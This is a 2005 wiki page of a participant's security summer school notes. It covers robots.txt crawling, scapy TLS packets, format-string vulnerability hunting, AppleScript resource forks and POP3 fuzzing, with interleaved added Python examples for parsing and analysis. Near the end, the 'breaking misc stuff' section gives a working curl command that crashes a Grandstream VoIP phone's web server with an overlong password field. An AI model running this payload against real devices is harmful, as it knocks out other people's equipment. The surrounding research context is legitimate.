Difference between revisions of "Summerschool Aachen 2005/Notes/Christians notes"


Revision as of 21:34, 25 September 2005

My Summerschool Projects

verBOTen.py

I've been running the following test for crawlers for about a year now: I added a "Disallow" entry to the robots.txt of my webserver and waited for crawlers to explicitly crawl that directory. It seems that there are no crawlers who are interested in files people don't want to be crawled. Together with Maximillian Dornseif, we wrote and set up verBOTen, a crawler that collects robots.txt files from 2.700.000 hostnames that we got from the Open Directory Project (http://www.dmoz.org/) and adds them to a database. The next step will be to crawl those files and ask in public to decide the level of interest of the files, similar to the EXIF thumbnail project.
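The test described above, checking whether a client that fetched robots.txt later requests a path it was told to stay away from, as an added example. This is not verBOTen.py or any code from the page; it assumes Apache "combined" log lines, and both the robots.txt body and the log lines are constructed for the example.

```python
"""Match web-server access logs against robots.txt Disallow rules.

Added example, not the page's verBOTen.py. Assumes Apache combined log
format; the robots.txt and log lines below are constructed.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

ROBOTS_TXT = """\
# constructed sample robots.txt
User-agent: *
Disallow: /private/
Disallow: /tmp/

User-agent: GoodBot
Disallow: /admin/
"""

# constructed log lines: a polite bot, a bot that reads robots.txt and then
# ignores it, and a browser that never looked at robots.txt
ACCESS_LOG = """\
203.0.113.7 - - [25/Sep/2005:20:01:02 +0200] "GET /robots.txt HTTP/1.1" 200 61 "-" "GoodBot/1.0"
203.0.113.7 - - [25/Sep/2005:20:01:03 +0200] "GET /index.html HTTP/1.1" 200 1043 "-" "GoodBot/1.0"
198.51.100.9 - - [25/Sep/2005:20:05:11 +0200] "GET /robots.txt HTTP/1.0" 200 61 "-" "SneakyCrawler/0.3"
198.51.100.9 - - [25/Sep/2005:20:05:12 +0200] "GET /private/secret.html HTTP/1.0" 404 208 "-" "SneakyCrawler/0.3"
192.0.2.4 - - [25/Sep/2005:20:07:00 +0200] "GET /private/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_robots(text):
    """Return {user_agent_token_lowercase: [disallowed path prefixes]}."""
    rules = defaultdict(list)
    agents = []          # tokens of the record currently being read
    in_rules = False     # a Disallow line has followed the User-agent lines
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if in_rules:                          # a new record starts here
                agents, in_rules = [], False
            agents.append(value.lower())
        elif field == "disallow":
            in_rules = True
            if value:                             # empty Disallow allows everything
                for agent in agents:
                    rules[agent].append(value)
    return dict(rules)


def rules_for(user_agent, rules):
    """Pick the record for a User-Agent header: the longest token contained in the
    header (case-insensitive); fall back to the '*' record."""
    ua = user_agent.lower()
    best = max((tok for tok in rules if tok != "*" and tok in ua), key=len, default=None)
    return rules.get("*", []) if best is None else rules[best]


def is_disallowed(path, prefixes):
    """robots.txt Disallow values are path prefixes."""
    return any(path.startswith(p) for p in prefixes)


def find_violations(log_text, robots_text):
    """Return one dict per request that hit a Disallowed path, noting whether the
    same ip/user-agent pair had fetched robots.txt earlier in the log."""
    rules = parse_robots(robots_text)
    read_robots = set()
    violations = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = urlsplit(m["path"]).path
        key = (m["ip"], m["ua"])
        if path == "/robots.txt":
            read_robots.add(key)
            continue
        if is_disallowed(path, rules_for(m["ua"], rules)):
            violations.append({"ip": m["ip"], "ua": m["ua"], "path": path,
                               "read_robots": key in read_robots})
    return violations


if __name__ == "__main__":
    for v in find_violations(ACCESS_LOG, ROBOTS_TXT):
        print(v)
```

Only requests whose client had already fetched robots.txt are interesting for the experiment; a browser wandering into /private/ is noise, which is why the result carries the read_robots flag instead of filtering it out.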

TLS support for scapy

I started to have a look at the very ugly TLS packet format and started to hack a first version of TLS packet generation for scapy. Max improved and bugfixed it, check his documentation for more ;-)
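To show what "very ugly" means in practice, here is an added example (not the scapy code referred to above) that builds one TLS record carrying a ClientHello and parses it back, checking every nested length field: 2-byte record length, 3-byte handshake length, 1-byte session id length, 2-byte cipher suite length, 1-byte compression length. It assumes the TLS 1.0 (version 3.1) layout; the client random and cipher suite numbers are constructed.

```python
"""Build and parse TLS records and a ClientHello by hand.

Added example, not the page's scapy TLS code. Follows the TLS 1.0 record
and handshake layout; sample random bytes and suite numbers are constructed.
"""
import struct

CONTENT_TYPE_HANDSHAKE = 22
HANDSHAKE_TYPE_CLIENT_HELLO = 1
MAX_RECORD_LENGTH = 2 ** 14 + 2048   # plaintext limit plus allowed expansion


def _need(buf, off, n, what):
    """Raise instead of silently slicing short when a length field overruns the buffer."""
    if off + n > len(buf):
        raise ValueError("truncated %s: need %d bytes at offset %d, have %d"
                         % (what, n, off, len(buf) - off))


def build_client_hello(version=(3, 1), cipher_suites=(0x002F, 0x0035), client_random=None):
    """Return one TLS record carrying a minimal ClientHello (no extensions)."""
    if client_random is None:
        client_random = bytes(range(32))            # constructed, fixed for reproducibility
    if len(client_random) != 32:
        raise ValueError("client random must be 32 bytes")
    suites = b"".join(struct.pack("!H", s) for s in cipher_suites)
    body = (struct.pack("!BB", *version) + client_random
            + b"\x00"                                   # session id length 0
            + struct.pack("!H", len(suites)) + suites   # 2-byte length, then suites
            + b"\x01\x00")                              # one compression method: null
    # handshake header: 1-byte type + 3-byte length
    handshake = struct.pack("!B", HANDSHAKE_TYPE_CLIENT_HELLO) + len(body).to_bytes(3, "big") + body
    # record header: 1-byte content type + 2-byte version + 2-byte length
    return struct.pack("!BBBH", CONTENT_TYPE_HANDSHAKE, version[0], version[1], len(handshake)) + handshake


def split_records(data):
    """Return a list of (content_type, version, payload) for every record in data."""
    records, off = [], 0
    while off < len(data):
        _need(data, off, 5, "record header")
        ctype, major, minor, length = struct.unpack_from("!BBBH", data, off)
        if length > MAX_RECORD_LENGTH:
            raise ValueError("record length %d exceeds TLS maximum" % length)
        off += 5
        _need(data, off, length, "record payload")
        records.append((ctype, (major, minor), data[off:off + length]))
        off += length
    return records


def parse_handshake(payload):
    """Split a handshake record payload into (handshake_type, body)."""
    _need(payload, 0, 4, "handshake header")
    htype = payload[0]
    length = int.from_bytes(payload[1:4], "big")
    _need(payload, 4, length, "handshake body")
    return htype, payload[4:4 + length]


def parse_client_hello(body):
    """Decode the variable-length fields of a ClientHello body into a dict."""
    _need(body, 0, 35, "ClientHello fixed part")
    version = (body[0], body[1])
    client_random = body[2:34]
    sid_len = body[34]
    off = 35
    _need(body, off, sid_len, "session id")
    session_id = body[off:off + sid_len]
    off += sid_len
    _need(body, off, 2, "cipher suites length")
    (suites_len,) = struct.unpack_from("!H", body, off)
    off += 2
    if suites_len % 2:
        raise ValueError("cipher suites length must be even")
    _need(body, off, suites_len, "cipher suites")
    suites = list(struct.unpack("!%dH" % (suites_len // 2), body[off:off + suites_len]))
    off += suites_len
    _need(body, off, 1, "compression methods length")
    comp_len = body[off]
    off += 1
    _need(body, off, comp_len, "compression methods")
    compression = list(body[off:off + comp_len])
    off += comp_len
    return {"version": version, "random": client_random, "session_id": session_id,
            "cipher_suites": suites, "compression_methods": compression,
            "extensions": body[off:]}                   # extensions are left undecoded


def decode_client_hello_record(data):
    """records -> handshake -> ClientHello fields, rejecting anything else."""
    ctype, version, payload = split_records(data)[0]
    if ctype != CONTENT_TYPE_HANDSHAKE:
        raise ValueError("not a handshake record")
    htype, body = parse_handshake(payload)
    if htype != HANDSHAKE_TYPE_CLIENT_HELLO:
        raise ValueError("not a ClientHello")
    return parse_client_hello(body)


if __name__ == "__main__":
    rec = build_client_hello()
    print(rec.hex())
    print(decode_client_hello_record(rec))
```

Every length is checked against the remaining buffer before slicing, so a record whose inner lengths disagree with its outer length is reported as an error rather than quietly producing an empty field.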

FakeIOI2CMotionSensor

Some time ago, I reverse engineered an application that uses the Apple Motion Sensor, a motion sensor that switches off the hard disk on fast acceleration to prevent damage. While my software runs well on PowerBooks, it refuses to work on the new AMS enabled iBooks. To have a generic way to find out the called driver functions and layout of the used structures, I want to create a replacement for the original driver to interact with the Apple software.

inspectf

Inspired by Max' idea, I started to write a library that replaces printf to inspect format strings in closed source software to find possible format string vulnerabilities. The library runs perfectly on Linux with the LD_PRELOAD environment variable, but it's a little bit bitchy on MacOS X. The linker DOES load the library (some debugging information can be turned on by setting DYLD_PRINT_LIBRARIES), but I couldn't convince the linker to overwrite the libc symbol, in spite of using the two variables DYLD_INSERT_LIBRARIES and DYLD_FORCE_FLAT_NAMESPACE.
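Once a printf wrapper has captured a format string, the question is what to look for in it. The added example below (not the inspectf library, and written in Python rather than as an interposed C function) parses printf directives and reports the two things worth flagging: conversions that write to memory (%n) and formats that consume more arguments than the call supplied. The sample format strings in the test are constructed.

```python
"""Static inspection of printf-style format strings.

Added example of the check a printf wrapper such as the one described on
the page could apply to each intercepted format string; not the author's
inspectf code. Sample format strings are constructed.
"""
import re

# %[argpos$][flags][width][.precision][length]conversion
DIRECTIVE = re.compile(
    r"%(?P<pos>\d+\$)?(?P<flags>[-+ #0']*)(?P<width>\*|\d+)?"
    r"(?:\.(?P<prec>\*|\d+))?(?P<length>hh|h|ll|l|j|z|t|L|q)?"
    r"(?P<conv>[diouxXeEfFgGaAcspnCS%])"
)


def parse_format(fmt):
    """Return (directives, malformed_positions) for a format string."""
    directives, malformed = [], []
    i = 0
    while True:
        i = fmt.find("%", i)
        if i < 0:
            break
        m = DIRECTIVE.match(fmt, i)
        if m is None:                        # lone '%' or unknown conversion
            malformed.append(i)
            i += 1
            continue
        d = m.groupdict()
        d["text"] = m.group(0)
        directives.append(d)
        i = m.end()
    return directives, malformed


def inspect_format(fmt):
    """Summarise what a call with this format string does with its arguments."""
    directives, malformed = parse_format(fmt)
    sequential = 0           # arguments consumed in order
    highest_positional = 0   # largest n seen in %n$
    writes, conversions = [], []
    for d in directives:
        if d["conv"] == "%":
            continue                         # literal percent, consumes nothing
        conversions.append(d["conv"])
        if d["conv"] == "n":
            writes.append(d["text"])
        # '*' width and '*' precision each pull one extra int argument
        consumed = 1 + (d["width"] == "*") + (d["prec"] == "*")
        if d["pos"]:
            highest_positional = max(highest_positional, int(d["pos"][:-1]))
        else:
            sequential += consumed
    return {
        "conversions": conversions,
        "args_needed": max(sequential, highest_positional),
        "writes_memory": bool(writes),
        "write_directives": writes,
        "malformed_at": malformed,
    }


def check_call(fmt, supplied_args):
    """Return findings for a printf-like call made with supplied_args arguments."""
    info = inspect_format(fmt)
    findings = []
    if info["writes_memory"]:
        findings.append("format writes to memory via %s" % ", ".join(info["write_directives"]))
    if info["args_needed"] > supplied_args:
        findings.append("format consumes %d argument(s) but only %d supplied: reads beyond the arguments"
                        % (info["args_needed"], supplied_args))
    for pos in info["malformed_at"]:
        findings.append("malformed directive at offset %d" % pos)
    return findings


if __name__ == "__main__":
    for fmt, nargs in [("%s %d\n", 2), ("%x%x%x%n", 0), ("100%", 0)]:
        print(repr(fmt), check_call(fmt, nargs))
```

A C wrapper cannot count the variadic arguments at run time, so the practical version of this check records each format string together with its call site and whether it lives in writable memory; the argument count is then reconciled against the call site by hand or from the disassembly.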

MacOS X reverse engineering

I had some information exchange with Frederic and together we had a closer look at MacOS X binaries and the linker. More information will follow soon.

Gera's challenges

For relaxing, I did some of Gera's challenges, mainly the advanced buffer overflows (especially level 1, 3 and 4).

AppleScript

AppleScript is the highly integrated scripting language of the OSA (Open Scripting Architecture) of MacOS X. The syntax is quite awkward, because you use something like natural language. When writing little helpers for automated fuzzing of web browsers, I tried to get some inspiration from other AppleScripts. The problem is that most AppleScript applications are delivered as a program (the bytecode + an interpreter) AND with a flag "execute only". That means the source code is not readable. Some Python scripting and comparing binary files revealed that the copy protection and the script itself are placed in the so-called "Resource Fork" of the binary (the interpreter, as any "normal" file, is located in the "Data Fork"). The only resource that differs in the protected and unprotected version of the AppleScript is the "scpt" resource ("SCriPT" - obviously).
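The "comparing binary files" step above is easier to read if the comparison is done per resource rather than per byte. The added example below (not the page author's scripts) walks a classic resource fork according to the layout in Apple's Resource Manager documentation (16-byte header, resource map with a type list and per-type reference lists, resource data items prefixed by a 4-byte length) and reports which (type, id) pairs differ between two forks. The two forks are constructed in code so the example runs without a real applet; on a real file the fork would be read from path + "/..namedfork/rsrc".

```python
"""Walk a classic Mac OS resource fork and diff resources between two forks.

Added example, not the page author's scripts. Layout follows Apple's
Resource Manager documentation; the two forks are constructed in code.
"""
import struct

DATA_START = 256   # header (16) + 112 reserved + 128 application bytes


def build_resource_fork(resources):
    """Build a minimal resource fork from [(type, id, data), ...]; type is 4 chars."""
    data, data_offsets = b"", []
    for rtype, _, payload in resources:
        if len(rtype) != 4:
            raise ValueError("resource type must be four characters")
        data_offsets.append(len(data))
        data += struct.pack("!I", len(payload)) + payload     # 4-byte length + bytes
    by_type = {}                                 # keeps first-seen order
    for idx, (rtype, rid, _) in enumerate(resources):
        by_type.setdefault(rtype, []).append((rid, data_offsets[idx]))
    type_list_len = 2 + 8 * len(by_type)         # count field + one 8-byte item per type
    items, ref_lists = b"", b""
    for rtype, refs in by_type.items():
        ref_off = type_list_len + len(ref_lists)  # offset from start of type list
        items += rtype.encode("latin-1") + struct.pack("!HH", len(refs) - 1, ref_off)
        for rid, doff in refs:                    # 12-byte reference entries, no names
            ref_lists += struct.pack("!hhB", rid, -1, 0) + doff.to_bytes(3, "big") + bytes(4)
    type_list = struct.pack("!H", len(by_type) - 1) + items + ref_lists
    map_len = 28 + len(type_list)
    header = struct.pack("!IIII", DATA_START, DATA_START + len(data), len(data), map_len)
    # map: header copy (16), next-map handle (4), file ref (2), attrs (2),
    # type list offset (2), name list offset (2), then the type list itself
    rmap = header + bytes(8) + struct.pack("!HH", 28, map_len) + type_list
    return header + bytes(DATA_START - 16) + data + rmap


def list_resources(fork):
    """Return {(type, id): data} for every resource in the fork."""
    if len(fork) < 16:
        raise ValueError("too short for a resource fork header")
    data_off, map_off, data_len, map_len = struct.unpack_from("!IIII", fork, 0)
    if data_off + data_len > len(fork) or map_off + map_len > len(fork):
        raise ValueError("header offsets point outside the fork")
    type_list_off, _name_list_off = struct.unpack_from("!HH", fork, map_off + 24)
    tl = map_off + type_list_off
    (ntypes_minus_one,) = struct.unpack_from("!H", fork, tl)
    found = {}
    for t in range(ntypes_minus_one + 1):
        item = tl + 2 + 8 * t
        rtype = fork[item:item + 4].decode("latin-1")
        nres_minus_one, ref_off = struct.unpack_from("!HH", fork, item + 4)
        for r in range(nres_minus_one + 1):
            ref = tl + ref_off + 12 * r
            rid, _name_off, _attrs = struct.unpack_from("!hhB", fork, ref)
            doff = int.from_bytes(fork[ref + 5:ref + 8], "big")   # 3-byte data offset
            (length,) = struct.unpack_from("!I", fork, data_off + doff)
            start = data_off + doff + 4
            if start + length > data_off + data_len:
                raise ValueError("resource %s %d overruns the data section" % (rtype, rid))
            found[(rtype, rid)] = fork[start:start + length]
    return found


def diff_resources(fork_a, fork_b):
    """Return the set of (type, id) whose contents differ or exist in only one fork."""
    a, b = list_resources(fork_a), list_resources(fork_b)
    return {key for key in a.keys() | b.keys() if a.get(key) != b.get(key)}


# constructed stand-ins for an unprotected and an execute-only applet
UNPROTECTED_FORK = build_resource_fork([
    ("TEXT", 128, b"applet readme"),
    ("scpt", 128, b"\x00\x01 compiled script"),
])
PROTECTED_FORK = build_resource_fork([
    ("TEXT", 128, b"applet readme"),
    ("scpt", 128, b"\x00\x01 execute-only blob"),
])

if __name__ == "__main__":
    print(sorted(list_resources(UNPROTECTED_FORK)))
    print(diff_resources(UNPROTECTED_FORK, PROTECTED_FORK))
```

Resource names are skipped (the name offset is written as -1 and never read), which is enough for a type/id level diff; the bounds check on each data item is there because a damaged or hostile fork can point a 3-byte data offset anywhere.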

breaking misc stuff

The Grandstream VoIP phone's webserver just broke; it seems that the password validation is done in the HTML form and the webserver itself is quite naive: curl -d "P2=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" http://172.30.20.71/dologin.htm

POP3 fuzzing

I started a POP3 protocol fuzzer in Python. It turns out that a) the clients I tested do not accept random data which does not look like a POP3 conversation at all and b) the fuzzer also should generate data that looks like real emails. The fuzzer will be released soon.